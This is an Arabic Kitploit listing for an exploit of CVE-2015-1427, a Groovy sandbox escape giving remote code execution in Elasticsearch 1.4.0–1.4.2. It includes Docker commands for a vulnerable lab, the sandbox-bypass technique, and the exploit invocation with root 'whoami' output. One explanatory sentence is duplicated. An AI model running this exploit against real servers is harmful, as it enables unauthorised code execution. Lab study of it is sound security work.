Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
exploit-CVE-2015-1427 — Elasticsearch 1.4.0 < 1.4.2 استغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد وحاوية قابلة للاختراق | Kitploit
أدوات/GitHubGitHub/t0kx/exploit-cve-2015-1427
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubt0kx/exploit-cve-2015-1427

exploit-CVE-2015-1427

Elasticsearch 1.4.0 < 1.4.2 استغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد وحاوية قابلة للاختراق

عرض المستودع
3213منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Elasticsearch 1.4.0 < 1.4.2 تنفيذ التعليمات البرمجية عن بعد

Elasticsearch هو محرك بحث وتحليلات موزع ومتوافق مع REST قادر على حل عدد متزايد من حالات الاستخدام. باعتباره قلب Elastic Stack، فإنه يخزن بياناتك مركزيًا حتى تتمكن من اكتشاف المتوقع والكشف عن غير المتوقع.

البيئة الضعيفة

لإعداد بيئة ضعيفة لاختبارك، ستحتاج إلى تثبيت Docker، ثم تشغيل الأمر التالي:

root@kitploit:~
docker build -t vuln/cve-2015-1427 .
docker run --rm -it -p 9200:9200 vuln/cve-2015-1427

وسيؤدي ذلك إلى تشغيل تطبيق ويب ضعيف على مضيفك على المنفذ 9200

الكود الضعيف

يوجد الخلل في واجهة برمجة التطبيقات REST، التي لا تتطلب مصادقة، حيث تسمح وظيفة البحث بتنفيذ كود Groovy ويمكن تجاوز صندوق الحماية الخاص بها باستخدام java.lang.Math.class.forName للإشارة إلى الفئات التعسفية. يمكن استخدامها لتنفيذ كود Java تعسفي. يوجد الخلل في واجهة برمجة التطبيقات REST، التي لا تتطلب مصادقة، حيث تسمح وظيفة البحث بتنفيذ كود Groovy ويمكن تجاوز صندوق الحماية الخاص بها باستخدام java.lang.Math.class.forName للإشارة إلى الفئات التعسفية. يمكن استخدامها لتنفيذ كود Java تعسفي.

الاستغلال

لاستغلال هذا الهدف، قم بتشغيل:

root@kitploit:~
./exploit.sh host:port

إذا كنت تستخدم هذه الصورة الضعيفة، يمكنك تشغيل:

root@kitploit:~
./exploit.sh 127.0.0.1:9200
[+] CVE-2015-1427 exploit by t0kx
[+] Exploiting 127.0.0.1:9200
[+] Trigger Payload...
[+] Running whoami: root
[+] Done

الاعتمادات

تم اكتشاف هذا الثغرة من قبل فريق أمن المعلومات في Cisco Systems و Cameron Morris.

إخلاء المسؤولية

هذا البرنامج أو البرامج السابقة هي لأغراض تعليمية فقط. لا تستخدمها دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة وأنني (t0kx) لست مسؤولاً عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. المؤلف أو أي مزود خدمة إنترنت لا يتحمل أي مسؤولية عن المحتوى أو إساءة استخدام هذه البرامج أو أي مشتقاتها. باستخدام هذه البرامج، فإنك تقبل أن أي ضرر (فقدان البيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية t0kx.

تنزيل الأداة